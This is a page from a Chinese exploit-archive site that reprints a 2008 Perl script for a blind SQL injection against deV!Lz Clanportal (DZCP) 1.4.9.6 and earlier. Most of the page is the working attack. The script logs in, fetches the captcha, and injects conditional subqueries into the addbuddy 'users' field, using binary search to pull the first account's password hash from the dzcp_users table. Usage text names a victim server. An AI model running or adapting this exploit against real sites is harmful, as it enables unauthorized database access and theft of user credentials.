首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 deV!Lz Clanportal [DZCP] <= 1.4.9.6 Blind SQL Injection Exploit 来源：www.vfcocus.net 作者：h0yt3r 发布时间：2008-11-04   use HTTP::Cookies; use LWP::UserAgent; my $ua    = LWP::UserAgent->new( cookie_jar => HTTP::Cookies->new,); $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); usage(); print "\n"; $server =   $ARGV[0]; $dir = $ARGV[1]; $username =   $ARGV[2]; $password = $ARGV[3]; if (!$password) { die "Argh! Read teh Usage!\n"; } $url0 = "http://".$server.$dir."user/index.php"; $url1 = $url0."?action=login&do=yes"; $url2 = $url0."?action=buddys&do=addbuddy"; syswrite(STDOUT, "[x]Connecting...", 16); $response = $ua->get($url0); if($response->is_success) {syswrite(STDOUT, "OK", 2);} else { print "\n[x]Ey I couldn't connect to ".$url0; exit;} print "\n"; $captcha = ($response->content =~ m/secure=login/i) ? 1 : 0; if($captcha) { captcha(); } $response = (!$captcha) ? $ua->post($url1, [ "user" => $username, "pwd" => $password ]) : $ua->post($url1, [ "user" => $username, "pwd" => $password , "secure" => $imgCode]); if($response->content =~ m/Sicherheitsscode/i) { print "[x]Lol you gave me wrong image code. Restart!"; exit; } elsif($response->content =~ m/gesperrt/i) { print "[x]Omg you gave me wrong user details. Restart!"; exit; } $response = $ua->get($url2); print "[x]Kay, unleashing BlackMagic now. Getta Coffee and wait!!\n"; my @Daten; array(); my $operator; syswrite(STDOUT, "[x]Password: ", 13); for($b=1;$b<=32;$b++) { inject(0,16); } print "\n[x]OmFg I made it!!\n"; print "[x]Have FUN!\n"; print "[x]Greetz & Shoutz go to: IP-Sh0k, haZl0oh, bizzit, NoNePub, thund3r ,ramon,\n"; print "   J0hn.X3r, electron1x, Paloxus, -tmh- aka B-Baerchi, Nazrek aka Patrick_B, WooMic, codeblu815\n"; print "   Free-Hack, Sys-Flaw, SoH and h4ck-y0u!\n"; print "[x]Biggest Thanks go to Shadowleet aka \$h4d0wl33t who is simply the best at his stuff!"; sub hex_to_ascii($) {               (my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg;         return $str; } sub inject {     $beg = $_[0]; $end = $_[1];       $mid = int(($beg + $end)/2); #print $mid."\n";     if(&equals($mid))     {               syswrite(STDOUT, hex_to_ascii($Daten[$mid]), 1);                         return;       }     elsif(&bigger($mid)) { return inject($mid + 1, $end); }       else { return inject($beg, $mid - 1); }       } sub equals { $ack = $_[0]; if( &request("=", $ack) !~ m/1242/i) { return 1; } } sub bigger { $ack = $_[0]; if(&request(">", $ack) !~ m/1242/i) { return 1; } } sub request {       $operator = $_[0]; $bick = $_[1];                             #probably only users without dzcp_     $response = $ua->post($url2, [ "users" => "999 and if(substring((select pwd from dzcp_users limit 0,1),".$b.",1)".$operator."0x".$Daten[$bick].",null,(select 1 union select 2))" ]);     #print $response->content;     return $response->content; } sub usage() {     print q     {     ------------------NON PUBLIC EXPLOIT-----------------     #####################################################             deV!L`z Clanportal BlackMagic EXPLOIT                           -Exploit coded by h0yt3r-                  Usage: devilz.pl [Server] [Path] [Username] [Password]      Sample:                                perl devilz.pl www.victim.com /devilz/ h0yt3r 1337      Exploit requires Username and Password, as the vul-      nerable file is only visible for registered users!     #####################################################     }; } sub captcha {     print "[x]Captcha required!\n";     $captchaURL = "http://".$server.$dir."/antispam.php?secure=login";     my $captchaReq= $ua->get($captchaURL);     open(IMG,">captcha.jpg");     binmode IMG;     print IMG $captchaReq->content;     close IMG;     system('start captcha.jpg');     print "[x]Image Code: ";     $imgCode = <STDIN>;     chop($imgCode);   } sub array {     for($b=30;$b<=39; $b++) { push(@Daten,$b); }     for($b=61;$b<=66; $b++) { push(@Daten,$b); } }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Chipmunk CMS (reguser.php) Add ·TR News <= 2.1 (login.php) Rem ·Simple Machines Forum (SMF) 1. ·deV!Lz Clanportal [DZCP] <= 1 ·Chipmunk CMS (reguser.php) Add ·PHPX 3.5.16 (news_id) Remote S ·Micro CMS <= 0.3.5 Remote (Add ·Adobe Reader util.printf() Jav ·FTP Now 2.6 Server Response Re ·Simple Machines Forum <= 1.1.6 ·U-Mail Webmail 4.91 (edit.php) ·e-Vision CMS <= 2.0.2 Multiple   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved